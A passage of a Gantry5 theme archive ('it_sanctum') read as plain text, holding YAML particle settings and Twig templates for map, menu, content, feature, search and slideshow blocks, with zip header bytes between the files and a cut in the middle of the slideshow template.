      description: Select the map type.
      placeholder: 'Select...'
      default: ROADMAP
      options:
        ROADMAP: Roadmap
        SATELLITE: Satellite
        HYBRID: Hybrid
        TERRAIN: Terrain

    latitude:
      type: input.text
      label: Latitude
      description: Enter the latitude of the location.
      default: 52.052312

    longitude:
      type: input.text
      label: Longitude
      description: Enter the longitude of the location.
      default: 4.447141

    zoom:
      type: input.text
      label: Zoom
      description: Set the zoom level of the map. Should be a number between 0 and 22.
      default: 7

    defaultmarker:
      type: select.select
      label: Default Marker
      description: Select whether or not a marker for the map coordinates should be shown.
      placeholder: 'Select...'
      default: show
      options:
        show: Show
        hide: Hide

    markertext:
      type: textarea.textarea
      label: Info Window
      description: Type in the text for the marker info window.
      default: 

    markerstate:
      type: select.select
      label: Info Window onLoad
      description: Select the default info window state when the page is loaded.
      placeholder: 'Select...'
      default: 1
      options:
        1: Show
        0: Hide

    scrollwheel:
      type: select.select
      label: Scrollwheel
      description: Enable or disable the scrollwheel map zooming. It is disabled by default.
      placeholder: 'Select...'
      default: 0
      options:
        1: Enable
        0: Disable

    dragging:
      type: select.select
      label: Dragging
      description: Enable or disable the map dragging. It is enabled by default.
      placeholder: 'Select...'
      default: enabled
      options:
        enabled: Enable
        disabled: Disable
        disabledmobile: Disable (Mobile Only)

    markers:
      type: collection.list
      array: true
      label: Additional Markers
      description: Create additional markers.
      value: name
      ajax: true

      fields:

        .latitude:
          type: input.text
          label: Latitude
          description: Enter the latitude of the location.

        .longitude:
          type: input.text
          label: Longitude
          description: Enter the longitude of the location.

        .markertext:
          type: textarea.textarea
          label: Marker Text
          description: Type in the marker text.
          default:

        .markerstate:
          type: select.select
          label: Info Window onLoad
          description: Select the default info window state when the page is loaded.
          placeholder: 'Select...'
          default: 1
          options:
            1: Show
            0: Hide

    snazzymaps:
      type: textarea.textarea
      label: SnazzyMaps Style
      description: Paste the code snippet that you have copied from SnazzyMaps.com.

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']PK!�*⺣.�.*it_sanctum/particles/content-pro.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set particleheading %}
	<div class="g-particle-intro">
		{% if particle.mainheading %}
			<h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
			<div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
		{% endif %}	
		{% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
	</div>
{% endset %}

{% set contentproitems %}
	{% for row in particle.items|batch(particle.columns|default('3')|e) %}
		{% if particle.behaviour|default('static') == 'static' %}<div class="g-grid">{% endif %}
			{% for item in row %}
				{% set attr_extra_item = '' %}
				{% for extra in item.extra %}
					{% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
				{% endfor %}

				{% set image %}
					<div class="g-content-pro-image">
						{% if particle.lightbox|default('enable') == 'enable' or particle.lightbox|default('enable') == 'disable' %}
							{% if particle.lightbox|default('enable') == 'enable' %}
								<a href="{{ url(item.image, false, 0) }}" data-uk-lightbox class="uk-overlay uk-overlay-hover">
								{% if particle.style|default('style1') == 'style1' %}
									<span class="uk-overlay-panel uk-overlay-background uk-overlay-icon uk-overlay-fade"></span>
								{% endif %}
							{% endif %}
								<img alt="{{ item.alt|e }}" src="{{ url(item.image) }}" {{ item.image|imagesize|raw }}>
							{% if particle.lightbox|default('enable') == 'enable' %}
								</a>
							{% endif %}
						{% endif %}

						{% if particle.lightbox|default('enable') == 'disablelink' %}
							{% if item.link %}<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">{% endif %}
								<img alt="{{ item.alt|e }}" src="{{ url(item.image) }}" {{ item.image|imagesize|raw }}>
							{% if item.link %}</a>{% endif %}
						{% endif %}
					</div>
				{% endset %}

				{% set title %}
					<h4 class="g-content-pro-title">
						{%- if item.link -%}
							<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
						{%- endif -%}
							{{- item.title|raw -}}
						{%- if item.link -%}
							</a>
						{%- endif -%}
					</h4>
				{% endset %}

				{% set date %}
					<div class="g-item-details">
						<span class="date"><i class="fa fa-clock-o"></i>{{ item.date|raw }}</span>
					</div>
				{% endset %}

				{% set description %}
					<div class="g-content-pro-desc">
						{{- item.description|raw -}}
					</div>
				{% endset %}

				{% set specialtext %}
					<div class="g-content-pro-special">
						{%- if item.icon -%}
							<i class="{{ item.icon|e }}"></i>
						{%- endif -%}
						{{- item.specialtext|raw -}}
					</div>
				{% endset %}

				{% set bottomlink %}
					<div class="g-content-pro-link">
						<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
							{{- item.bottomlink|raw -}}
							<i class="fa fa-long-arrow-right"></i>
						</a>
					</div>
				{% endset %}

				{% set style1 %}
					<div class="g-content-pro-item">
						{% if item.image %}
							{{ image }}
						{% endif %}

						{% if item.title or item.description %}
							<div class="g-info-container">
								{% if item.title %}
									{{ title }}
								{% endif %}

								{% if item.date %}
									{{ date }}
								{% endif %}

								{% if item.description %}
									{{ description }}
								{% endif %}

								{% if item.specialtext or item.bottomlink %}
									<div class="g-bottom-info clearfix{% if item.specialtext == false %} no-special{% endif %}{% if item.bottomlink == false %} no-link{% endif %}">
										{% if item.specialtext %}
											{{ specialtext }}
										{% endif %}

										{% if item.bottomlink %}
											{{ bottomlink }}
										{% endif %}
									</div>
								{% endif %}
							</div>
						{% endif %}
					</div>
				{% endset %}

				{% set style2 %}
					<div class="g-content-pro-item uk-overlay uk-overlay-hover">
						{% if item.image %}
							{{ image }}
						{% endif %}

						{% if item.title or item.description %}
							<div class="g-info-container-style2 uk-overlay-panel uk-overlay-background uk-overlay-bottom uk-overlay-slide-bottom">
								{% if item.title %}
									{{ title }}
								{% endif %}

								{% if item.date %}
									{{ date }}
								{% endif %}

								{% if item.description %}
									{{ description }}
								{% endif %}

								{% if item.specialtext or item.bottomlink %}
									<div class="g-bottom-info clearfix{% if item.specialtext == false %} no-special{% endif %}{% if item.bottomlink == false %} no-link{% endif %}">
										{% if item.specialtext %}
											{{ specialtext }}
										{% endif %}

										{% if item.bottomlink %}
											{{ bottomlink }}
										{% endif %}
									</div>
								{% endif %}
							</div>
						{% endif %}
					</div>
				{% endset %}

				{% set style3 %}
					<div class="g-content-pro-item uk-overlay">
						{% if item.image %}
							{{ image }}
						{% endif %}

						{% if item.title or item.description %}
							<div class="g-info-container-style2 uk-overlay-panel uk-overlay-background uk-overlay-bottom">
								{% if item.title %}
									{{ title }}
								{% endif %}

								{% if item.date %}
									{{ date }}
								{% endif %}

								{% if item.description %}
									{{ description }}
								{% endif %}

								{% if item.specialtext or item.bottomlink %}
									<div class="g-bottom-info clearfix{% if item.specialtext == false %} no-special{% endif %}{% if item.bottomlink == false %} no-link{% endif %}">
										{% if item.specialtext %}
											{{ specialtext }}
										{% endif %}

										{% if item.bottomlink %}
											{{ bottomlink }}
										{% endif %}
									</div>
								{% endif %}
							</div>
						{% endif %}
					</div>
				{% endset %}

				{% if particle.behaviour|default('static') == 'static' %}
					<div class="g-block{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
						<div {% if particle.gutter|default('enabled') == 'enabled' %}class="g-content"{% endif %}>
							{% if particle.style|default("style1") == "style1" %}{{ style1 }}{% endif %}
							{% if particle.style|default("style1") == "style2" %}{{ style2 }}{% endif %}
							{% if particle.style|default("style1") == "style3" %}{{ style3 }}{% endif %}
						</div>
					</div>
				{% endif %}

				{% if particle.behaviour|default('static') == 'slider' or particle.behaviour|default('static') == 'slideset' %}
					<li {% if item.class %}class="{{ item.class|e }}"{% endif %} {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
						{% if particle.style|default("style1") == "style1" %}{{ style1 }}{% endif %}
						{% if particle.style|default("style1") == "style2" %}{{ style2 }}{% endif %}
						{% if particle.style|default("style1") == "style3" %}{{ style3 }}{% endif %}
					</li>
				{% endif %}

			{% endfor %}
		{% if particle.behaviour|default('static') == 'static' %}</div>{% endif %}
	{% endfor %}
{% endset %}

{% block particle %}
	
	{% if particle.behaviour|default('static') == 'static' %}
		<div class="g-content-pro {{ particle.style|default("style1")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}{% if particle.pullup|default(0) %} g-pullup{% endif %}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
			{% if particle.mainheading or particle.introtext %}
				{{ particleheading }}
			{% endif %}
			{{ contentproitems }}
		</div>
	{% endif %}
	{% if particle.behaviour|default('static') == 'slider' %}
		<div class="g-content-pro-slider {{ particle.style|default("style1")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}{% if particle.pullup|default(0) %} g-pullup{% endif %}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
			{% if particle.mainheading or particle.introtext %}
				{{ particleheading }}
			{% endif %}		    	
			<div class="uk-slidenav-position" data-uk-slider{% if particle.autoplay|default("disable") == "enable" %}="{autoplay:true, autoplayInterval: {{ particle.autoplayInterval|default(7000)|e}}}"{% endif %}>
				<div class="uk-slider-container">
					<ul class="uk-slider{% if particle.gutter|default('enabled') == 'enabled' %} uk-grid{% endif %} uk-grid-width-medium-1-{{ particle.columns|default('3')|e }}">
						{{ contentproitems }}
					</ul>
				</div>
				{% if (particle.navigation|default('arrows') == 'arrows') or (particle.navigation|default('arrows') == 'both') %}
					<div class="g-particle-navigation">
						<a href="" class="uk-slidenav uk-slidenav-previous" data-uk-slider-item="previous" aria-label="{{'Previous'|trans_key('IT_ACCESS_PREVIOUS')}}"></a>
						<a href="" class="uk-slidenav uk-slidenav-next" data-uk-slider-item="next" aria-label="{{'Next'|trans_key('IT_ACCESS_NEXT')}}"></a>
					</div>
				{% endif %}
			</div>		    	
		</div>
	{% endif %}
	{% if particle.behaviour|default('static') == 'slideset' %}
		<div class="g-content-pro-slideset {{ particle.style|default("style1")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}{% if particle.pullup|default(0) %} g-pullup{% endif %}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
			{% if particle.mainheading or particle.introtext %}
				{{ particleheading }}
			{% endif %}	    	
			<div class="uk-slidenav-position" data-uk-slideset="{small: 1, medium: {{ particle.columns|default('3')|e }}, large: {{ particle.columns|default('3')|e }}, duration: {{ particle.duration|default(200)|e}}, {% if particle.autoplay|default("disable") == "enable" %}autoplay: 'true', autoplayInterval: {{ particle.autoplayInterval|default(7000)|e}},{% endif %} animation: '{{ particle.animation|default('fade')|e}}'}">
				<div class="uk-slider-container">
					<ul class="uk-slideset uk-grid">
						{{ contentproitems }}
					</ul>
				</div>
				{% if (particle.navigation|default('arrows') == 'arrows') or (particle.navigation|default('arrows') == 'both') %}
					<div class="g-particle-navigation">
						<a href="" class="uk-slidenav uk-slidenav-previous" data-uk-slideset-item="previous" aria-label="{{'Previous'|trans_key('IT_ACCESS_PREVIOUS')}}"></a>
						<a href="" class="uk-slidenav uk-slidenav-next" data-uk-slideset-item="next" aria-label="{{'Next'|trans_key('IT_ACCESS_NEXT')}}"></a>
					</div>
				{% endif %}
				{% if (particle.navigation|default('arrows') == 'dots') or (particle.navigation|default('arrows') == 'both') %}
					<ul class="uk-slideset-nav uk-dotnav uk-flex-center">
	    			{% set counter = 0 %}
	    			{% for item in particle.items %}
	    				<li data-uk-slideset-item="{{ counter }}"><a href="" aria-label="{{'Item'|trans_key('IT_ACCESS_ITEM')}} {{ counter }}"></a></li>
	    				{% set counter = counter + 1 %}
	    			{% endfor %}
					</ul>
				{% endif %}
			</div>		    	
		</div>
	{% endif %}
{% endblock %}PK!S��ALL)it_sanctum/particles/page-title.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% block particle %}
    <div class="g-page-title{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
        <div class="g-grid">
            <div class="g-block">
                <div class="g-page-title-inner">
                    {% if particle.title or particle.icon %}
                        <h3>
                            {%- if particle.icon -%}
                                <i class="{{ particle.icon|e }}"></i>
                            {%- endif -%}
                            {%- if particle.title -%}
                                {{- particle.title|e -}}
                            {%- endif -%}
                        </h3>
                    {% endif %}

                    {% if particle.description %}
                        <span>{{ particle.description|e }}</span>
                    {% endif %}
                </div>
            </div>
        </div>
    </div>
{% endblock %}PK!��A##+it_sanctum/particles/modal-search.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set platformsearch %}
	{% if gantry.platform.getName() == 'joomla' %}
		{{ gantry.platform.filter("{loadposition modal-search}")|html|raw }}
	{% endif %}

	{% if gantry.platform.getName() == 'wordpress' %}
		{{ gantry.platform.call('get_search_form') }}
	{% endif %}

	{% if gantry.platform.getName() == 'grav' %}
		{% include 'partials/simplesearch_searchbox.html.twig' %}
	{% endif %}
{% endset %}

{% set modalsearch %}
	<a href="#modal-search" data-uk-modal aria-label="{{'Search'|trans_key('IT_ACCESS_SEARCH')}}"><i class="fa fa-search"></i></a>

	<div id="modal-search" class="uk-modal">
		<div class="uk-modal-dialog">
			<a class="uk-modal-close uk-close" aria-label="{{'Close'|trans_key('IT_ACCESS_CLOSE')}}"></a>
			{{ platformsearch }}
		</div>
	</div>
{% endset %}

{% set modalsearch_s2 %}
	<a href="#modal-search" data-uk-modal="{center:true}" aria-label="{{'Search'|trans_key('IT_ACCESS_SEARCH')}}"><i class="fa fa-search"></i></a>

	<div id="modal-search" class="uk-modal">
		<a class="uk-modal-close uk-close" aria-label="{{'Close'|trans_key('IT_ACCESS_CLOSE')}}"></a>
		<div class="uk-modal-dialog">
			{{ platformsearch }}
		</div>
	</div>
{% endset %}

{% block particle %}
	
	<div class="modal-search-container {{ particle.style|default("style1")|e }}">
		{% if particle.style|default("style1") == "style1" %}{{ modalsearch }}{% endif %}
		{% if particle.style|default("style1") == "style2" %}{{ modalsearch_s2 }}{% endif %}
	</div>

{% endblock %}PK!����+it_sanctum/particles/main-feature.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set attr_extra_left = '' %}
{% if particle.extra_left %}
    {% for attributes in particle.extra_left %}
        {% for key, value in attributes %}
            {% set attr_extra_left = attr_extra_left ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set attr_extra_right = '' %}
{% if particle.extra_right %}
    {% for attributes in particle.extra_right %}
        {% for key, value in attributes %}
            {% set attr_extra_right = attr_extra_right ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set textcontent %}
    {% if particle.title %}
        <h3 class="g-main-feature-title">
            {{- particle.title|raw -}}
        </h3>
    {% endif %}

    {% if particle.description %}
        <p class="g-main-feature-desc">
            {{- particle.description|raw -}}
        </p>
    {% endif %}

    {% if particle.link or particle.link2 %}
        <div class="g-main-feature-buttons">

            {% if particle.link %}
                <a class="button g-main-feature-link" href="{{ particle.link|e }}" target="{{ particle.target|default('_blank')|e }}">
                    {%- if particle.buttonicon -%}
                        <i class="{{ particle.buttonicon|e }}"></i>
                    {%- endif -%}
                    {{- particle.buttontext|raw -}}
                </a>
            {% endif %}

            {% if particle.link2 %}
                <a class="button g-main-feature-link g-button2" href="{{ particle.link2|e }}" target="{{ particle.target2|default('_blank')|e }}">
                    {%- if particle.buttonicon2 -%}
                        <i class="{{ particle.buttonicon2|e }}"></i>
                    {%- endif -%}
                    {{- particle.buttontext2|raw -}}
                </a>
            {% endif %}

        </div>
    {% endif %}
{% endset %}

{% set imagecontent %}
    {% if particle.image %}
        <img class="g-main-feature-image{% if particle.imagebottom|default('yes')|e == 'yes' %} image-bottom{% endif %}" alt="{{ particle.alt|e }}" src="{{ url(particle.image) }}" {{ particle.image|imagesize|raw }}>
    {% endif %}
{% endset %}

{% block particle %}
    <div class="g-main-feature{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
        <div class="g-grid">
            <div class="g-block g-main-feature-left{% if particle.css.left %} {{ particle.css.left|e }}{% endif %}{% if particle.layout|default('right')|e == 'left' %} image-block size-{{ particle.imagewidth|default(50)|e }}{% endif %}" {% if particle.extra_left %}{{ attr_extra_left|raw }}{% endif %}>
                <div class="g-content">
                    {% if particle.layout|default('right')|e == 'right' %}{{ textcontent }}{% endif %}
                    {% if particle.layout|default('right')|e == 'left' %}{{ imagecontent }}{% endif %}
                </div>
            </div>

            <div class="g-block g-main-feature-right{% if particle.css.right %} {{ particle.css.right|e }}{% endif %}{% if particle.layout|default('right')|e == 'right' %} align-right image-block size-{{ particle.imagewidth|default(50)|e }}{% endif %}" {% if particle.extra_right %}{{ attr_extra_right|raw }}{% endif %}>
                <div class="g-content">
                    {% if particle.layout|default('right')|e == 'right' %}{{ imagecontent }}{% endif %}
                    {% if particle.layout|default('right')|e == 'left' %}{{ textcontent }}{% endif %}
                </div>
            </div>
        </div>
    </div>
{% endblock %}PK!���		&it_sanctum/particles/onepage-menu.yamlnu&1i�name: OnePage Menu
description: Display OnePage Menu.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable OnePage Menu particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    stickyoffset:
      type: input.text
      label: Sticky Offset
      description: Set the sticky offset in pixels (when the OnePage Menu should get fixed/sticky).
      default: 130

    smoothscrolloffset:
      type: input.text
      label: Smooth Scroll Offset
      description: Set the smooth scroll offset in pixels (the element top offset).
      default: 120

    boundary:
      type: input.text
      label: Boundary
      description: Type in the boundary element, for example `#g-footer`. This keeps the sticky element within the dimensions of the boundary element.
      default: '#g-footer'

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Menu Items
      description: Create each menu item to display.
      value: name
      ajax: true

      fields:

        .title:
          type: input.text
          label: Menu Title
          description: Type in the Menu Title.

        .icon:
          type: input.icon
          label: Menu Title Icon
          description: Choose an icon to be placed in front of the Menu Title.

        .link:
          type: input.text
          label: ID
          description: Type in the ID of the corresponding part of the site (without '#').

        .subtitle1:
          type: input.text
          label: Submenu 1 Title
          description: Type in the Submenu 1 Title.

        .subicon1:
          type: input.icon
          label: Submenu 1 Title Icon
          description: Choose an icon to be placed in front of the Submenu 1 Title.

        .sublink1:
          type: input.text
          label: ID (Submenu 1)
          description: Type in the ID of the corresponding part of the site (without '#').

        .subtitle2:
          type: input.text
          label: Submenu 2 Title
          description: Type in the Submenu 2 Title.

        .subicon2:
          type: input.icon
          label: Submenu 2 Title Icon
          description: Choose an icon to be placed in front of the Submenu 2 Title.

        .sublink2:
          type: input.text
          label: ID (Submenu 2)
          description: Type in the ID of the corresponding part of the site (without '#').

        .subtitle3:
          type: input.text
          label: Submenu 3 Title
          description: Type in the Submenu 3 Title.

        .subicon3:
          type: input.icon
          label: Submenu 3 Title Icon
          description: Choose an icon to be placed in front of the Submenu 3 Title.

        .sublink3:
          type: input.text
          label: ID (Submenu 3)
          description: Type in the ID of the corresponding part of the site (without '#').

        .subtitle4:
          type: input.text
          label: Submenu 4 Title
          description: Type in the Submenu 4 Title.

        .subicon4:
          type: input.icon
          label: Submenu 4 Title Icon
          description: Choose an icon to be placed in front of the Submenu 4 Title.

        .sublink4:
          type: input.text
          label: ID (Submenu 4)
          description: Type in the ID of the corresponding part of the site (without '#').

        .subtitle5:
          type: input.text
          label: Submenu 5 Title
          description: Type in the Submenu 5 Title.

        .subicon5:
          type: input.icon
          label: Submenu 5 Title Icon
          description: Choose an icon to be placed in front of the Submenu 5 Title.

        .sublink5:
          type: input.text
          label: ID (Submenu 5)
          description: Type in the ID of the corresponding part of the site (without '#').

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!���77-it_sanctum/particles/image-features.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
	{% for attributes in particle.extra %}
		{% for key, value in attributes %}
			{% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
		{% endfor %}
	{% endfor %}
{% endif %}

{% set particleheading %}
	<div class="g-particle-intro">
		{% if particle.mainheading %}
			<h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
			<div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
		{% endif %}	
		{% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
	</div>
{% endset %}

{% set imagefeaturesitems %}
	{% for row in particle.items|batch(particle.columns|default('2')|e) %}
		<div class="g-grid">
			{% for item in row %}
				{% set attr_extra_item = '' %}
				{% for extra in item.extra %}
					{% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
				{% endfor %}

				{% set image %}
					{% if item.image %}
						<div class="g-block size-{{ item.imagewidth|default(33)|e }} g-image-features-image{% if item.link %} uk-overlay uk-overlay-hover{% endif %}">
							{% if item.link %}
								<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
									<span class="uk-overlay-panel uk-overlay-background uk-overlay-icon uk-overlay-fade"></span>
							{% endif %}
								<img alt="{{ item.alt|e }}" src="{{ url(item.image) }}" {{ item.image|imagesize|raw }}>
							{% if item.link %}
								</a>
							{% endif %}
						</div>
					{% endif %}
				{% endset %}

				{% set content %}
					{% if item.title or item.description %}
						<div class="g-block g-image-features-content">
							{% if item.title %}
								<h4 class="g-image-features-title">
									{%- if item.link -%}
										<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
									{%- endif -%}
										{{- item.title|raw -}}
									{%- if item.link -%}
										</a>
									{%- endif -%}
								</h4>
							{% endif %}

							{% if item.description %}
								<div class="g-image-features-desc">
									{{- item.description|raw -}}
								</div>
							{% endif %}

							{% if item.specialtext or item.bottomlink %}
								<div class="g-bottom-info clearfix{% if item.specialtext == false %} no-special{% endif %}">
									{% if item.specialtext %}
										<div class="g-image-feature-special">
											{%- if item.icon -%}
												<i class="{{ item.icon|raw }}"></i>
											{%- endif -%}
												{{- item.specialtext|raw -}}
										</div>
									{% endif %}

									{% if item.bottomlink %}
										<div class="g-image-features-link">
											<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
												{{- item.bottomlink|raw -}}<i class="fa fa-long-arrow-right"></i>
											</a>
										</div>
									{% endif %}
								</div>
							{% endif %}
						</div>
					{% endif %}
				{% endset %}

				<div class="g-block{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
					<div class="g-content">
						<div class="g-image-features-item layout-{{ item.layout|default('left')|e }}">
							<div class="g-grid">
								{% if item.layout|default('left') == 'left' %}
									{{ image }}
									{{ content }}
								{% else %}
									{{ content }}
									{{ image }}
								{% endif %}
							</div>
						</div>
					</div>
				</div>
			{% endfor %}
		</div>
	{% endfor %}
{% endset %}

{% set featurecontent %}

{% endset %}

{% block particle %}

	<div class="g-image-features{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
		{% if particle.mainheading or particle.introtext %}
			{{ particleheading }}
		{% endif %}
		{{ imagefeaturesitems }}
	</div>
{% endblock %}PK!l�Bm5m5(it_sanctum/particles/slideshow.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set particleheading %}
    <div class="g-particle-intro">
        {% if particle.mainheading %}
            <h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
            <div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
        {% endif %} 
        {% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
    </div>
{% endset %}

{%- set slideshow_settings -%}
    {
        autoplay:{{ particle.autoplay|default("true")|e }},
        autoplayInterval:{{ particle.autoplayInterval|default(7000)|e }},
        kenburns:{{ particle.kenburns|default("false")|e }},
        animation:'{{ particle.animation|default('fade')|e }}',
        duration:{{ particle.animationDuration|default(500)|e }},
        pauseOnHover:{{ particle.pauseOnHover|default("true")|e }},
        height:'{{ particle.height|default('auto')|e }}'
    }
{%- endset -%}

{% set slideshow_slides %}
    {% for item in particle.items %}

        {% set slide_media %}
            {% if item.image %}
                <img alt="{{ item.alt|e }}" src="{{ url(item.image) }}" {{ item.image|imagesize|raw }}>
            {% endif %}
            {% if item.videoiframe %}
                {{ item.videoiframe|raw }}
            {% endif %}
        {% endset %} 

        {% set slide_overlay %}

            {% set overlay_position %}
                {%- if item.overlayposition|default('bottom') == 'bottom' -%}
                    uk-overlay-bottom
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'left' -%}
                    uk-overlay-left
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'right' -%}
                    uk-overlay-right
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'top' -%}
                    uk-overlay-top
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'bottom-left' -%}
                    uk-flex-bottom
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'bottom-center' -%}
                    uk-flex-bottom uk-flex-center
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'bottom-right' -%}
                    uk-flex-bottom uk-flex-right
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'middle-left' -%}
                    uk-flex-middle
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'middle-center' -%}
                    uk-flex-middle uk-flex-center
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'middle-right' -%}
                    uk-flex-middle uk-flex-right
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'top-left' -%}
                    uk-flex-top
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'top-center' -%}
                    uk-flex-top uk-flex-center
                {%- endif -%}

                {%- if item.overlayposition|default('bottom') == 'top-right' -%}
                    uk-flex-top uk-flex-right
                {%- endif -%}
            {% endset %}

            {% set slide_overlay_animation %}
                {%- if item.overlayanimation|default('fade') == 'fade' -%}
                    uk-overlay-fade
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'slide-left' -%}
                    uk-overlay-slide-left
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'slide-right' -%}
                    uk-overlay-slide-right
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'slide-top' -%}
                    uk-overlay-slide-top
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'slide-bottom' -%}
                    uk-overlay-slide-bottom
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'slide-left-short' -%}
                    uk-overlay-slide-left uk-overlay-left-short
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'slide-right-short' -%}
                    uk-overlay-slide-right uk-overlay-right-short
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'slide-top-short' -%}
                    uk-overlay-slide-top uk-overlay-top-short
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'slide-bottom-short' -%}
                    uk-overlay-slide-bottom uk-overlay-bottom-short
                {%- endif -%}

                {%- if item.overlayanimation|default('fade') == 'scale' -%}
                    uk-overlay-scale
                {%- endif -%}
            {% endset %}

            {% set title %}
                <h3 class="g-slideshow-title">
                    {%- if item.link -%}
                        <a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
                    {%- endif -%}
                        {{- gantry.platform.filter(item.title)|html|raw -}}
                    {%- if item.link -%}
                        </a>
                    {%- endif -%}
                </h3>
            {% endset %}

            {% set description %}
                <div class="g-slideshow-desc">
